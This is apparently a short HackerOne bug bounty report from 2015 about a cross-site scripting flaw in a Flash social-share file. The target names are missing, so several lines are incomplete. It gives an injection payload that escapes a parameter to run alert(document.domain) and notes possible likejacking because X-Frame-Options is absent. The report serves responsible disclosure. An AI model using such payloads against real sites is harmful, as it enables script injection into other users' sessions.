Flash XSS on

ID H1:58831
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:22:06


Vulnerable Flash File:

Steps: + Open\%22));alert(document.domain);}catch(e){}// + Click on social share and click on anything (eg. twitter)

Severity: + XSS on + There is an ActionScript function bound to javascript using external interface. So, I suspect that like jacking is possible since doesn't send X-FRAME-OPTIONS.